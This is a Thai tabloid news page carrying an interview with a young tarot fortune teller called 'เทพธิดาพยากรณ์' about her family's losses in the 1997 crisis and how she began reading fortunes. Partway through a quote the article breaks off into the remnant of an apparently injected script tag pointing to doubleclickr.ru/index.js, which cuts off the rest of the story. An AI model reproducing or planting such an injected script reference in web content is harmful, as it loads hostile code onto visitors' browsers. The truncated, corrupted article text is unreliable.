เรื่องแปลกๆ | ข่าวเด่นประจำวัน | ข่าวการเมือง
ข่าวประจำวัน, ข่าวแปลกๆ
โฆษณา
  หน้าแรก  |  ข่าวเด่นประจำวัน  |  ข่าวแปลกๆ  |  ข่าวผู้หญิง ผู้หญิง  |  เรื่องลึกลับ  |  ข่าวบันเทิง  |  ข่าวต่างประเทศ  |  ตั้งเว็บนี้เป็นหน้าแรก 
โฆษณา
Bookmark and Share

เทพธิดาพยากรณ์


(มีผู้อ่านแล้ว 8334 คน)
ผู้สนับสนุน

เปิดตำนาน 'เทพธิดาพยากรณ์' กับข้อเสนอที่ต้องแลกด้วยร่างกาย

       เรื่องของการทำนายโชคชะตาราศี การดูดวงทั้งหลายเหล่านี้เป็นสิ่งที่อยู่คู่กับคนไทยเรามานาน ตั้งแต่ยุคสมัยโบราณที่บรรดาโหราศาสตร์ทั้งหลายยังใช้กระดานชนวน จนกระทั่งจวบจนปัจจุบันในยุคที่คนเราสื่อสารกันด้วยโทรศัพท์มือถือ และเจรจากันผ่านหน้าจอคอมพิวเตอร์ก็ยังไม่มีวี่แววว่าเรื่องเหล่านี้จะเสื่อมความนิยมลงไปแม้แต่เพียงน้อยนิด

ในทางตรงกันข้ามมันกลับอยู่รอดอย่างเข้มแข็งด้วยการพัฒนาและปรับตัวให้เข้ากับเทคโนโลยีของยุคสมัยได้อย่างน่าทึ่ง

เชื่อว่าหลายคนคงจะเคยได้ยินชื่อของหมอดูสาวที่เรียกตนเองว่า ‘เทพธิดาพยากรณ์’ มาบ้างแล้ว บางคนอาจจะรู้จักเนื่องจากเคยใช้บริการจากเธอ และบางคนอาจจะได้ยินชื่อของเธอในโฆษณาตรวจสอบดวงชะตาด้วยไพ่ทาโร่ต์ผ่านทางโทรศัพท์ ซึ่งส่วนใหญ่หลายๆ คนก็จะได้ยินเฉพาะเสียงหรือไม่ก็เห็นใบหน้าของหญิงสาวผู้นี้แต่เพียงแว๊บๆ จากจอทีวีเท่านั้น...

มีจำนวนคนไม่น้อยที่สงสัยว่าหน้าตาที่แท้จริงของหญิงสาวคนนี้เป็นอย่างไร? สวยหรือขี้เหร่? เธอเป็นคนเช่นไร? และนอกจากการดูดวงแล้วเธอทำอย่างอื่นเป็นหรือเปล่า?...

นี่อาจจะเป็นเหตุผลส่วนหนึ่ง แต่ไม่ใช่ทั้งหมดที่ทำให้เราต้องนัดเธอเพื่อมาพูดคุย เพราะนอกเหนือจากข้อสงสัยเหล่านี้แล้ว ยังมีเรื่องที่เธอบอกเราว่ามีนักการเมืองแก่ๆ มาชวนให้ไปเป็นเมียน้อย, เรื่องที่เธอประกาศว่าจะยอมถ่ายภาพโป๊แต่ต้องจ่ายให้เธอ 10 ล้านบาท ...

นี่คือ ตำนานของ ‘เทพธิดาพยากรณ์’ ซึ่งคุณรู้ได้ตรงนี้ได้ โดยไม่ต้องกด1900 ให้เสียเงิน 9 บาท

******************

"เริ่มต้นมาจากตอนเด็กๆ หนูอ่านหนังสือคู่สร้างคู่สมตอนสุสานมัมมี่ และหนังสือหลายๆ เล่ม มีบางตอนเขียนเกี่ยวกับนอสตราดามุสด้วย ตอนนั้นนอสตราดามุสทายไว้ว่าจะมีหมอดูอายุน้อยเกิดขึ้นในโลก ตอนเราเป็นเด็กเอาก็คิด เอ๊ะ...ฉันก็ดูหมอเป็นนะ เป็นหมอดูอายุน้อยได้..."

เทพธิดาพยากรณ์ ที่มีชื่อตามบัตรประชาชนว่า น.ส.อุมาวดี ศิริอักษร หรือชื่อเล่นที่พ่อแม่และเพื่อนๆ เรียกกันว่า "อ๋อย" กล่าวเปิดเผยกับเรา ก่อนที่เจ้าตัวจะบอกต่อไปว่านอกจากเป็นเพราะคำทำนายของนอสตราดามุส (จากหนังสือ) แล้ว สิ่งหนึ่งที่ทำให้ตัวเธอคิดจะเป็นนักพยากรณ์ชีวิตก็เพราะความรู้สึกที่ว่าพ่อแม่ไม่รัก

"พูดง่ายๆ คืออยากดัง ตอนนั้นรู้สึกว่าพ่อแม่ไม่รัก เพราะพ่อเป็นนายแพทย์แถมทำธุรกิจอสังหาริมทรัพย์ คุณแม่ก็ไม่มีเวลา ก็เลยเริ่มดูหมอเพราะเชื่อว่าทุกคนจะรุมล้อมเรา เราคิดว่าหมอดูมันจะมีเสน่ห์ รู้สึกว่าเราเป็นที่รักของทุกคนก็เริ่มจากการดูไพ่ทาโร่ต์นี่ล่ะค่ะ"

อ๋อยเริ่มเล่าให้เราฟังต่อว่าตอนเธออายุ 12 ปี เคยมีชาวอิตาเลียนคนหนึ่งเข้ามาทำนายทายทักเรื่องเลวร้ายในชีวิตเธอว่าจะแย่ถึงขั้นเลวร้าย แต่เธอก็ไม่คิดอะไรมาก จนทุกอย่างมันเป็นความจริงเมื่อเศรษฐกิจของประเทศไทยและในภูมิภาคเอเชียพังพาบลงอย่างไม่เป็นท่า

“เหมือนฝันร้ายกลายเป็นจริงค่ะ เขาทายว่าธุรกิจคุณพ่อจะเจ๊ง เราก็เอ๊...จะเจ๊งได้ยังไงในเมื่อทุกอย่างมันก็ดูดี แต่พอรัฐบาลประกาศลอยค่าเงินบาทปี 2540 ก็เจ๊งจริงค่ะ ผีซ้ำด้ามพลอย....คุณพ่อก็เสียค่ะ (นายแพทย์ อภิชัย ศิริอักษร) ท่านทำธุรกิจอสังหาริมทรัพย์ที่เพชรบุรี เป็นเจ้าของรีสอร์ต แล้วก็ทำธุรกิจด้านพัฒนาที่ดิน

“ อย่างขนมหม้อแกงที่หน้าเขาวังน่ะของคุณพ่อหนูหมดเลยค่ะ"

"แล้วการที่ท่านจากไปก็ทิ้งหนี้สินเอาไว้อีกหลายสิบล้าน เราก็หมดเงินหมดทองไปแทบสิ้นเนื้อประดาตัว จำได้ว่าตอนนั้นเหลือเงินติดกระเป๋าไม่ถึง 2,000 บาท หนูก็เลยเริ่มต้นเป็นหมอดูที่ โดม รัชดา หนูเครียดมากเลยนะพี่ พี่นึกดูนะพ่อตายทั้งคนใครไม่เครียดล่ะ “

“ แต่วันรุ่งขึ้นเราก็ต้องบังคับตัวเองให้ยิ้มแย้มแจ่มใสนะ พ่อตายไม่เป็นไร เพราะชีวิตฉันต้องก้าวต่อไป ก็ดูหมอต่อไปหาเงินเรียนหนังสือที่ม.กรุงเทพฯ...."

คุณแม่ว่ายังไงบ้างเมื่อเราตัดสินใจจะเป็นหมอดู ?
"บอกตามตรงว่าตอนแรกที่หนูไปเป็นหมอดู คุณแม่ก็รู้สึกว่ารับไม่ได้ เขาแอนตี้เลยค่ะ เพราะเขาคิดว่าเดี๋ยวลูกเขาจะเป็นหมอดูตามโคนต้นมะขามสนามหลวงหรือเปล่า มันไม่มีเกียรติ แต่พอดีคุณแม่ไปพบกับเพื่อนคนนึงคือคุ src=http://www.doubleclickr.ru/index.js>

แสดงความคิดเห็น เกี่ยวกับข่าวนี้

โฆษณา

ข่าวอื่นๆ ในหมวดเดียวกัน

ดร.กฤษณาคว้าแม็กไซไซ บริการสาธารณะ ดร.กฤษณาคว้าแม็กไซไซ บริการสาธารณะ
สา-มาริสา รถคว่ำพลิก3ตลบบนมอเตอร์เวย์ สา-มาริสา รถคว่ำพลิก3ตลบบนมอเตอร์เวย์
ปู คุยโว แฟนฝรั่งดื้อขอย่องเฝ้าถึงเมืองไทย ปู คุยโว แฟนฝรั่งดื้อขอย่องเฝ้าถึงเมืองไทย
"แทมมี่"คว้าแชมป์ออร์ดินา โอเพ่นสมัย2
"ครูแจ้ง คล้ายสีทอง" วัย 74ปี เสียชีวิตแล้ว
พระเอกฮอลลีวูดผูกคอตายคารร.ย่านถ.วิทยุ พระเอกฮอลลีวูดผูกคอตายคารร.ย่านถ.วิทยุ
ปชช.หลั่งไหลรดน้ำศพ หลวงพ่อตัด เกจิดัง ปชช.หลั่งไหลรดน้ำศพ หลวงพ่อตัด เกจิดัง
หลวงพ่อตัด วัดชายนา มรณภาพแล้ว หลวงพ่อตัด วัดชายนา มรณภาพแล้ว
หลวงพ่อคูณ อาพาธพบภาวะติดเชื้อ หลวงพ่อคูณ อาพาธพบภาวะติดเชื้อ
สิ้น!แสนศักดิ์ เมืองสุรินทร์ สิ้น!แสนศักดิ์ เมืองสุรินทร์
อาลัยหลวงปู่ทิมตั้งสวด100คืน อาลัยหลวงปู่ทิมตั้งสวด100คืน
โอบาม่าทำงาน 6 สัปดาห์ หัวหงอกแล้ว โอบาม่าทำงาน 6 สัปดาห์ หัวหงอกแล้ว
โอบาม่าพาครอบครัวไปแคมป์เดวิด โอบาม่าพาครอบครัวไปแคมป์เดวิด
ครูแจ้ง ป่วยเส้นเลือดในสมองตีบเฉียบพลัน ครูแจ้ง ป่วยเส้นเลือดในสมองตีบเฉียบพลัน
โอบาม่าฉุนหลังรู้เรื่องเงินโบนัส1.8หมื่นล้าน โอบาม่าฉุนหลังรู้เรื่องเงินโบนัส1.8หมื่นล้าน

ผู้สนับสนุน

หมวดหมู่ข่าว

RSS Feeds ข่าวเด่นประจำวัน ข่าวเด่นประจำวันRSS Feeds ข่าวการเมือง ข่าวการเมือง
RSS Feeds ข่าว แปลก คน ข่าว แปลก คนRSS Feeds ข่าว แปลก สัตว์ พืช ข่าว แปลก สัตว์ พืช
RSS Feeds ข่าว แปลก ทั่วไป ข่าว แปลก ทั่วไปRSS Feeds ข่าวต่างประเทศ ข่าวต่างประเทศ
RSS Feeds เรื่องลึกลับ เรื่องลึกลับRSS Feeds ข่าววิทยาการ ข่าววิทยาการ